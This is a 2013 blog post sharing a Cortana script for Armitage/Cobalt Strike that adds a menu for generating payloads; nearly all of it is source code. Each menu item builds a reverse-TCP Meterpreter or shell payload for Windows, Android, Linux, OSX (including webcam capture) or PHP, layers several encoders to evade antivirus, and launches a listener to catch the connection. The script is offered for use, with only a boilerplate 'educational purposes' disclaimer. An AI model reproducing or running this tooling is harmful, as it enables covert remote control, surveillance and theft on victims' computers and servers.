Comments

Tuesday, December 10, 2013

Three Days with Cortana Script Engine - Cobalt Strike/Armitage

Posted by at Tuesday, December 10, 2013 Read our previous post

Beacon A new advance payload for Cobalt Strike_thumb[2]

 

Auto Payload Menu meets Cobalt Strike Script Engine

Bored again scripting a short Payload menu for Cobalt/Armitage

Some Screenshots :

Kali-2013-12-09-19-39-36Kali-2013-12-09-19-40-14Kali-2013-12-09-19-40-01Kali-2013-12-09-19-40-35Kali-2013-12-09-19-39-51Kali-2013-12-09-19-40-28Kali-2013-12-09-19-42-06Kali-2013-12-09-19-42-16Kali-2013-12-10-01-35-29Kali-2013-12-09-19-45-05Kali-2013-12-10-01-36-02Kali-2013-12-10-01-36-12   Kali-2013-12-09-19-45-43         

Source Code :

# Multi Payload Menu Engine v0.1
# Contana Script Engine r0ckz.
# by cr4shyyyy
# from http://security-is-just-an-illusion.blogspot.de

menubar("Payloads", "payloads",2);

popup payloads {
menu "Windows Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x86 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x86 Reverse Tcp Payload");
cmd($console, "msfpayload windows/meterpreter/reverse_tcp LHOST=$ip LPORT=$port EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x86 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x86/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Meta x64" {
$ip = prompt_text("Enter Host for Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter x64 Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter x64 Reverse Tcp Payload");
cmd($console, "msfpayload windows/x64/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X | msfencode -c 10 -e x86/shikata_ga_nai > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD windows/x64/meterpreter/reverse_tcp");
cmd($console, "set Encoder x86/shikata_ga_nai");
cmd($console, "set EXITFUNC process");
cmd($console, "set ExitOnSession false");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 x64 Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD windows/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 Encoder x64/shikata_ga_nai");
println("\c9Meterpreter\c9 EXITFUNC process");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Android Payloads" {
item "Reverse Meta Java" {
$ip = prompt_text("Enter Host for Android Reverse Tcp Payload");
$port = prompt_text("Enter Port for Reverse Tcp Payload");
$filehandler = prompt_text("Enter Android Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Android Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Android Reverse Tcp Payload");
cmd($console, "msfpayload android/meterpreter/reverse_tcp LHOST=$ip LPORT=$port R > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD android/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Android Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD android/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "Linux Payloads" {
item "Reverse Meta x86" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter Linux Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter Linux Reverse Tcp Payload");
cmd($console, "msfpayload linux/x86/meterpreter/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x86/meterpreter/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 Linux Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x86/meterpreter/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
item "Reverse Shell x64" {
$ip = prompt_text("Enter Host for Linux Reverse Tcp Payload");
$port = prompt_text("Enter Port for Linux Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Shell Linux x64 Reverse Shell Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Shell Linux Reverse Shell Payload");
cmd($console, "msfpayload linux/x64/shell_reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD linux/x64/shell_reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Shell\c4 Linux x64 Reverse Shell Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD linux/x64/shell_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "OSX Payloads" {
item "Reverse iSight" {
$ip = prompt_text("Enter Host for OSX Reverse Tcp Payload");
$port = prompt_text("Enter Port for OSX Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 OSX iSight Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("OSX iSight Reverse Tcp Payload");
cmd($console, "msfpayload osx/x86/isight/reverse_tcp LHOST=$ip LPORT=$port X > /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD osx/x86/isight/reverse_tcp");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4OSX iSight \c4Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD osx/x86/isight/reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
menu "PHP Payloads" {
item "Reverse Meta PHP" {
$ip = prompt_text("Enter Host for PHP Reverse Tcp Payload");
$port = prompt_text("Enter Port for PHP Tcp Payload");
$filehandler = prompt_text("Enter Filename for Reverse Tcp Payload");
if
($ip !is $null) {
show_message("Lets Pwn The Box!");
println("\n----------------------------------------\n\c4Create\c4 Meterpreter PHP Reverse Tcp Payload Now \n----------------------------------------");
$console = console();
$console = open_console_tab("Meterpreter PHP Reverse Tcp Payload");
cmd($console, "msfpayload php/meterpreter_reverse_tcp LHOST=$ip LPORT=$port R | msfencode -c 1 -e php/base64 -t raw -o /root/Desktop/$filehandler");
cmd($console, "use exploit/multi/handler");
cmd($console, "set LHOST $ip");
cmd($console, "set LPORT $port");
cmd($console, "set PAYLOAD php/meterpreter_reverse_tcp");
cmd($console, "set AutoSystemInfo 1");
cmd($console, "exploit -j");
println("----------------------------------------\n\c4Meterpreter\c4 PHP Reverse Tcp Payload Ready\n----------------------------------------");
println("\c9Meterpreter\c9 LHOST $ip");
println("\c9Meterpreter\c9 LPORT $port");
println("\c9Meterpreter\c9 PAYLOAD php/meterpreter_reverse_tcp");
println("\c9Meterpreter\c9 FILEPATH /root/Desktop/$filehandler");
println("\n----------------------------------------\n\ Security is just an Illusion\n----------------------------------------");
}
}
}
}

No comments:

Post a Comment

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template